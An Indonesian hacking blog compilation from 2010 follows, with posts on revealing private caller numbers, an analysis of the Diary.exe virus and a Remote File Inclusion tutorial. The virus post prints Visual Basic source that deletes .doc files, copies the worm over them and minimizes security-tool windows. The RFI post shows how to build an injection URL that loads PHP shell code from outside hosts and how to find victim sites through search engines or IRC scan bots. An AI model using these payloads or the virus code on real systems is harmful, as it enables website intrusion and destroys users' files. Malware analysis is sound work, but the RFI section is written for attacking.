Directory enumeration
Menganalisa directori dan struktur dari website tersebut, dan mencari directory tersembunyi, maupun mencari direktori yang memiliki write akses.

Dan masih banyak lagi metode serangan lainnya seperti :

File Inclusion, Script Source Code Disclosure, CRLF Injection Cross Frame Scripting (XFS), PHP Code Injection, XPath Injection, LDAP Injection, Blind SQL/XPath Injection, Authentication attacks, Buffer overflows.

Sabtu, 25 September 2010

Rahasia : Menampilkan Private Number


Sehubungan dengan banyaknya pertanyaan yang masuk baik di milis maupun melalui pesan pribadi, jadi alangkah baiknya jika saya berikan saja sedikit "tutorial" agar tidak terdapat pertanyaan yang berulang - ulang, khususnya dalam masalah ini yaitu bagaimana menampilkan nomer private number penelpon yang masuk ke kita.

CARA PERTAMA:
Ketikkan kode *#30# dan tekan OK, maka di layar akan muncul tulisan " nomer penelpon ditampilkan" atau biasanya tergantung dari tipe hp masing - masing. Untuk kode ini sayangnya tidak didukung oleh operator di Indonesia, jadi ini hanya sebagai bahan pengetahuan saja. kapan yah di Indonesia operatornya bisa?

CARA KEDUA
Mendivert semua panggilan tidak dikenal. Pada setiap hp ada fasilitas divert/ pengalihan ini, nah pada malam hari jika memaksa tetap mengaktifkan hp dan biasanya ada orang iseng gunakan fasilitas divert ini, caranya alihkan semua panggilan tidak dikenal (yang tidak tercantum di phonebook) ke kotak mailbox, jadi setiap panggilan masuk yang nomernya hidden bakalan masuk ke mailbox dan nanti kita akan mendapatkan sms bahwa pemanggil dengan nomer 08xxxxxxxx telah menghubungi anda. Lihat record dari nomer tersebut sapa saja yang menelpon. Khusus untuk Exelcom,Indosat dan Kartu Halo biasanya bisa.

CARA KETIGA
Di saat anda tahu ada orang iseng dengan menelpon berulang - ulang menggunakan private number, sebaiknya setelah panggilan ketiga kalinya, matikan hp anda sampai beberapa waktu,tujuannya agar penelpon kena pulsa,hehehe. Maksudnya supaya dia masuk ke kotak mailbox juga, nah seperti cara kedua, maka saat kita menghidupkan hp kita nomer penelpon akan diberikan oleh operator kita. Misalnya jika kita menggunakan Exelcom, maka smsnya akan datang dari 818 dengan isi " anda telah dihubungi oleh 081xxxxxxx pada 23:15 dst...". Saya rasa ini adalah cara paling ampuh secara tradisional yang bisa diterapkan di Indonesia.

CARA KEEMPAT
Saat anda tahu ada penelpon iseng dengan menggunakan private number, maka gunakan hp anda untuk menelpon, nah maka saat dia mencoba menelpon anda di tempat si penelpon iseng tersebut akan masuk ke mailbox karena nada sibuk. Untuk mengetahui nomernya si penelpon biasanya anda mendapatkan sms seperti yang saya jelaskan di cara ketiga di atas.

CARA KELIMA
Reject telpon anda dengan menekan tombol bergambar telpon warna merah (tombol off) dan biarkan si penelpon masuk ke mailbox. Sayangnya cara ini tidak selalu bisa, karena dianggap kita sengaja menolak setelah mengetaui penelponnya, tapi untuk malam hari kebanyakan cara ini akan menggiring penelpon ke kotak mailbox kita sehingga sekali lagi kita akan mendapat sms seperti sebelumnya.

Untuk pembuktian semua cara ini, silahkan lakukan sendiri terlebih dahulu untuk meyakinkan anda. Jadi anda bisa memilih cara mana yangs ekiranya lebih didukung oleh hp anda dan operatornya. Cara ini mungkin masih sederhana, tapi saya harap bisa membantu anda yang sering diterror oleh penelpon iseng. Silahkan rekan - rekan lain menambahkan jika memiliki cara dan pengalaman berbeda seperti di atas.

Rahasia : Diary.Exe, Apa dan Bagaimana?

A little Words...
Penulis ingin menyampaikan bagaimana virus Diary.exe bekerja dan
tidak ada maksud untuk menyinggung atau menyakiti perasaan korban -
korban yang telah terinfeksi oleh virus ini. Analisis Virus dalam Artikel
ini mungkin bersifat sangat Dasar, oleh karena itu Saya mohon maaf
sebesar-besarnya jika ada kekurangan.
Start...
>Diary.Exe adalah salah satu Virus (yang katanya cukup Berbahaya oleh
Vaksin.com) buatan Vxer (pembuat Virus) lokal. Virus ini dibuat dengan
menggunakan Bahasa Visual Basic 6.0.
Menurut Norman AV, virus ini dikategorikan sebagai varian dari Virus
Kangen yang sempat tersebar beberapa waktu lalu. Saya tidak tahu
mengapa disebut-sebut sebagai varian kangen, apakah karena Icon yang
dipilih adalah Icon MS-Word? atau karena sifatnya yg menginfeksi file
MS-WORD saja? Sampai saat ini saya belum tahu.. Yang pasti virus ini
pertama kali disebarkan di Laboratorium Komputer di salah satu
Universitas yang ada di Depok.
>Virus Diary.Exe bekerja menggunakan algoritma (yang kurang-lebihnya)
sebagai berikut :
|START EXECUTION|
| Create File Diary Seorang Newbie.txt |
|di folder %userprofile%\Application Data|
|
|Periksa apakah folder %ProgramFiles%\Common Files\System ada?|
| tidak ada
|------------------------------------------->|
ada |
53
| |
| Create file Explorer.Exe di folder | |Create file di folder
| %ProgramFiles%\Common Files\System | %systemroot&\System32|
|<-------------------------------------------|
|Infeksi key-key di Registry, Hidden file, Disableregistrytools, Dll|
|
|Periksa apakah folder %Program Files%\InstallShield Installation Information ada?|
| tidak ada
|--------------------------------------------->|
ada |
| |Create folder %Program Files%\InstallShield
| Installation Information|
| |
| |
|<---------------------------------------------|
|Create file Rsvdb.Exe ke %Program Files%\InstallShield Installation Information|
|
|Create file RegsvcChk.Exe ke folder %SystemRoot%|
|
|Create file Spoolsw.Exe ke folder %userprofile%\Application Data|
|
|Execute Regsvcchk.Exe|
|
|Execute Spoolsw.Exe|
|
|Deteksi dan hapus Virus Kangen All Varian di Komputer|
|
|Deteksi dan Infeksi semua File MS-Word (*.Doc) di Komputer|
|
|END EXECUTION|
Semua file MS-Word yang terdeteksi akan diambil namanya, lalu sang
virus akan meng-gandakan dirinya menggunakan nama file tsb. Lalu
bagaimana dengan file .Doc tersebut?
File tsb akan dihapus/didelete. Algoritma jahat inilah yang merugikan
banyak user komputer karena semua file .Docnya telah hilang.
>Berikut cuplikan dari Source Code Diary.Exe :
----------------------------Cut Here---------------------------------
Private Sub cek(path As String)
On Error Resume Next
If Right(path, 1) <> "\" Then
path = path + "\"
54
End If
Set fol = fso.getfolder(path)
Set fil = fol.Files
Set subfol = fol.subfolders
If fso.fileexists(path + "Diary.exe") = True Then
GoTo a
Else
Call copi("Diary.exe", path)
End If
a: For Each fil2 In fil
If fso.getextensionname(fil2.Name) = "doc" Or fso.getextensionname(fil2.Name) = "DOC"
Then
desk1 = Left(fil2.Name, Len(fil2.Name) - 4)
Call copi(desk1 + ".exe", path)
Kill fil2.path
End If
Next
For Each subfols In subfol
cek (subfols.path)
Next
End Sub
----------------------------Cut Here---------------------------------
----------------------------Cut Here---------------------------------
Private Sub Timer1_Timer()
On Error Resume Next
Call GetActiveWindowName
tutup
If InStr(tampung, "A:") <> 0 Then
cek ("A:")
End If
cari
If i > 0 Then
For j = 0 To i - 1
If desk(j) <> "" Then
If InStr(tampung, desk2(j)) <> 0 Then
cek (desk2(j))
End If
End If
Next
End If
End Sub
----------------------------Cut Here---------------------------------
>Algoritma tersebut adalah bagaimana Virus bisa mendeteksi dikala user
sedang membuka Removeable Drive (Disket, USB, Dll) dengan
mengambil Window Captionnya. Hal ini tidak akan berlaku bila user
membukanya di lingkungan DOS (Command Prompt). Dengan cara itu
pula virus bisa menggandakan dirinya dan menyebarkannya lewat
Floopy Disk atau USB Drive.
>Virus juga akan me-Minimize window-window yang mempunyai string
"Registry Editor",
"Application Data", "WINDOWS", "WINNT", "Program Files", "Command
Prompt, "DOS", "Task",
55
"Process", "System", "Hijack", dan "Kill". Berikut adalah code dari
algortima tsb :
----------------------------Cut Here---------------------------------
Private Sub tutup()
If InStr(tampung, "Registry Editor") <> 0 Or InStr(tampung, "Application Data") <> 0 Or
InStr(tampung, "WINDOWS") <> 0_
Or InStr(tampung, "WINNT") <> 0 Or InStr(tampung, "Program Files") <> 0 Or
InStr(tampung, "Command Prompt") <> 0_
Or InStr(tampung, "DOS") <> 0 Or InStr(tampung, "Task") <> 0 Or InStr(tampung,
"Process") <> 0 Or InStr(tampung, "System") <> 0_
Or InStr(tampung, "Hijack") <> 0 Or InStr(tampung, "Kill") <> 0 Then
CloseWindow GetForegroundWindow
End If
End Sub
----------------------------Cut Here---------------------------------
>Sebagai Virus pasti Diary.Exe juga memerlukan suatu method Autorun
saat komputer Boot. Virus ini menggunakan key di
HKLM\Software\Microsoft\Windows\CurrentVersion\Run dengan
value NvsSchd dan berisi data %Program Files%\Common
Files\System\Explorer.exe.
>Karena ketidaksempurnaan dalam penulisan program, maka virus ini
hanya dapat berjalan di sistem operasi Windows XP, 2000 atau 2003. Virus
ini berukuran sekitar 60 Kb dan yang telah dikompresi berukuran 20 Kb
dengan menggunakan kompresi UPX.
$API Functions List...
>GetSystemDirectory
GetWindowText
GetDesktopWindow
GetTopWindow
CloseWindow
GetWindowText
GetForegroundWindow
FindWindow
SendMessage
$Advantages N Disadvantages...
>Virus berukuran cukup kecil
>Selain mem-blok akses, juga me-minimize window-window
>Virus tidak dapat berjalan di Windows 9x dan Me
>Teknik search file masih menggunakan FSO dan WSH
>Menghapus file korban
56
$End...
>Diary.Exe dapat dikatakan salah satu virus lokal berbahaya karena
menghapus file-file MS-Word di Komputer yang terinfeksi. Penyebaran
virus ini masih rendah, Media penyebarannya melalui Disket dan USB
Drive. Teknik searching file .Doc menggunakan teknik file scripting
object. Dan implementasi Key Registry menggunakan teknik Windows
Scripting.
Demikian artikel sederhana ini, kurang atau lebihnya saya mohon maaf....

Rahasia : Mengenal Shell Exploite Inject


Mungkin anda masih merasa bingung dengan shell exploite inject pada web tapi pada dasarnya semua shell sama saja cuma yang membedakan cara pemakaian shell atau bentuk dari shell itu sendiri apa berbasis aplikasi atau berbasis website tapi namanya shell jelas command - command masih sama mungkin misalkan pada shell yang aplikasi servernya berbasis linux jelas perintah yang digunakan berbasis linux juga.

nah kali ini saya akan membahas tentang shell inject yang jelas saja berbasis website karena pada umumnya orang - orang memakai shell ini dalam dunia IRC biasa disebut dengan kalimat “target” saya juga heran mengapa dinamakan target? mungkin karena sudah kebiasaan padahal namanya shell inject.

* Bagaimana cara mendapatkan shell tersebut ?
*


Mudah saja hanya dengan meman faatkan bugs bugs pada script web tersebut biasanya itu semua kelalaian dari pemakai web yang mempunyai bugs nah dalam pencarian shell inject berbasis web ini ada bermacam cara - cara injected tapi saya akan membahas cara inject dengan Remote File Inclusion Vulnerability itu menggunakan bugs dalam file script pada website yang akan di inject

* Bagaimana cara melihat bugs pada suatu script aplikasi pada website ?

Hanya dengan menggunakan rumus logika panggilan data (include,require) ditambah dengan variabel pada script tersebut inlclude + $variabel semua memakai rumus seperti itu contoh script

($docroot.’/FCDIRECTORY/fc_functions/fc_functions.php’); ?> require <— panggilan data $docroot <— variabel /FCDIRECTORY/fc_functions/fc_functions.php

<— directory dan file dimana ditemukan bugs (kerusakan atau kelemahan) jelas pada script di atas kelihatan bugs jika dikaitkan dengan rumus include+variabel maka akan menjadi suatu shell inject tinggal kita mengolah script tersebut. sekarang kita akan membentuk suatu script yang sebentar akan dikaitkan dengan link pada website degan cara memutar balikan script tersebut dengan mengubah kedudukan include dan variabel serta mengubah variabel yang dikenal tanda “$” menjadi “?”

$docroot.’/FCDIRECTORY/fc_functions/fc_functions.phpjika diputar balikan akan menjadi

/FCDIRECTORY/fc_functions/fc_functions.php?docroot=

Kaitan Bugs dan Link pada Website
Ini merupakan saat yang paling enak dipelajari apa kaitan bugs dengan link pada website atau target website yang akan kita masuk. Jelas kaitanya sangat erat dan wajib untuk diperlakukan. Mengapa?..karena tanpa bugs tersebut kita tidak bisa mendapatkan shell inject kita akan masuk pada website melalui bugs atau kelemahan pada website tersebut dimana letak kelemahan website tersebut … ? letaknya ada pada script bugs

require ($docroot.’/FCDIRECTORY/fc_functions/fc_functions.php’); ?>

sekarang kita akan menggabungkan link website dengan bugs tapi sebelumnya kita harus mempunyai injection atau code shell php anda bisa dapatkan pada link http://psychophobia.co.cc/psycho? atau http://artworkmarket.com/components/rey?
nah sekarang akan kita gabungkan akan menjadi seperti

/FCDIRECTORY/fc_functions/fc_functions.php?docroot=[shell code]contoh:

www.site.com/

[path]/FCDIRECTORY/fc_functions/fc_functions.php?docroot=[shell code]gunakan shell code :

http://psychophobia.co.cc/psycho?

contoh :

fc_functions.php?docroot=http://psychophobia.co.cc/psycho?

jika sudah menjadi seperti itu kita tinggal mencari target website yang siap kita masuk biasanya pencarian target website lewat situs pencarian seperti yahoo,google,altavista,lycos dan masih banyak lagi atau bisa menggunakan bot scan perl lewat IRC (yang menggunakan bot scan kerjaan orang malas) namun apa salahnya jika teknologi semakin berkembang menggapa tidak jika kita menggunakan sesuatu yang akan mempermudah pekerjaan kita .

Pusing… pusing… pusing.. , wekekekkeke.., tenang bro pada kenyataannya untuk mencarinya tidak sesulit yang kita pikirkan koq, kadang teori memang rumit tapi praktek yang kita inginkan. Kuncinya agar kita dapat melaksanakannya adalah, 1. kemauan, 2. gemar baca artikel mengenai hal tersebut, 3. sedikit tanya sana - sini, dan terutama… Prakteknya